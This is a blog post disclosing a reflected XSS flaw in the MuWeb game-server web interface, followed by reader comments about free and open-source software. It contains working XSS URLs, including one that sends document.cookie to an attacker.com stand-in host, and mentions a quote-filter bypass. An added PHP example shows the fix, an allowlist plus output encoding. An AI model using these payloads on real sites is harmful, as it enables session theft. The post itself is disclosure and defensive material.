XSS MuWeb

Very often, when I’ve got nothing to do, I think about how to better secure a website/server (it depends). And by accident last week I came upon an XSS vulnerability on a MU server on which I am a co-administrator…

What version of Mutoolz? Don’t know, but if you’re eager to find out, browse the web or simply ask Google… OK, it’s not Mutoolz based; it’s called MuWeb, a custom-developed Mu web interface by a guy who doesn’t give a damn about security…

Anyway this MuWeb, which has the most sickly written code [it takes you a good period of time to modify it] could be exploited in the following way:

http://muwebsite.com/index.php?op=<script>alert(/xss/)</script>

Yes, it doesn’t use good filters, just some type of filter based on regular expressions… as I used to say: if you ain’t good at regex, DON’T use them… anyway, it filters out double and single quotes. So what? It’s still vulnerable to XSS, but the classical cookie stealing method won’t work:

http://muwebsite.com/index.php?op=<script>document.location='http://attacker.com/steal.php?C='+document.cookie</script>

But we can bypass this filter, can’t we? By using String.fromCharCode().
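
Why stripping quotes does not close the hole, and what does, as an added PHP example (not MuWeb's code; the function names and the module list are hypothetical). It runs the quote-free payload from the first URL above through a quote-stripping regex, then through an allowlist for `op` and HTML output encoding.

```php
<?php
// Added example, not MuWeb's code. All function names and the
// ALLOWED_OPS module list are hypothetical.

// The kind of filter the post describes: a regex that only strips quotes.
function strip_quotes_filter(string $value): string
{
    return preg_replace('/[\'"]/', '', $value);
}

// Fix 1: "op" selects a page, so accept only known identifiers.
const ALLOWED_OPS = ['home', 'rankings', 'register'];

function resolve_op(?string $op): string
{
    // Strict comparison; anything unknown falls back to the default page.
    return in_array($op, ALLOWED_OPS, true) ? $op : 'home';
}

// Fix 2: encode for the HTML context at the point of output,
// instead of trying to remove "dangerous" characters on input.
function html_out(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed input: the payload from the post's first URL (contains no quotes).
$op = '<script>alert(/xss/)</script>';

// The quote filter has nothing to strip, so the markup passes through intact.
echo 'blacklist unchanged: ';
var_dump(strip_quotes_filter($op) === $op);

// The allowlist never lets the value reach the page at all.
echo 'allowlisted op: ', resolve_op($op), PHP_EOL;

// If the value must be echoed (e.g. in an error message), encoding makes it inert text.
echo 'encoded output: ', html_out($op), PHP_EOL;
```

Because the encoding step neutralises `<` and `>` themselves, it does not matter whether the script body needs quotes or builds its strings another way.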

My question is… How can someone develop components for a Mu Server if they’re making a vulnerable one at the top layer (web app layer)? Who tests these components? Why don’t they test them accurately?

P.S. Funny thing, after I discovered this XSS vulnerability, I thought I’d find another two with Acunetix… guess what, Acunetix didn’t even find the XSS vulnerability :-?

P.P.S No it’s not the regular MuWeb, it’s one combined with Php-Nuke -> http://softshare.uv.ro/

5 comments so far

  1. =Master= on

    Hey, it’s a free project, what do you want from that?

  2. dblackshell on

    I admire free projects… or should I call them open source… anyway there should be some guidelines in it… the more secure it is the better appreciated it will be… I wasn’t attacking it I just didn’t appreciate that they relied on php-nuke’s security implementation…

  3. [...] The best information on the topic can be found at the source here [...]

  4. ENC on

    First, Open Source and Free is not the same thing.
    Free doesn’t mean it’s Open Source and Open Source doesn’t necessarily mean that it’s free, just that the Source is available (it could be available for a price). So don’t confuse the two terms.

    Second, just because it’s free, doesn’t mean it shouldn’t be criticized. Just because someone released it for free, doesn’t mean it has to be crappy. Now, if it is crappy, we have the right to criticize it. It’s called “freedom of speech”. So stick your “it’s free” excuse where the sun doesn’t shine and join all the other pathetic losers that put the “it’s free so don’t complain” on their forehead as a pathetic excuse for the inability to code something that is even moderately securified and working.

  5. dblackshell on

    @ENC: I don’t get your attitude… earlier versions of MuWeb were open source, at least the one I used to have… when I wrote the article the current version was 0.8 which wasn’t conclusive if it was free/open source… some sub versions (and patches) had the license, while others didn’t

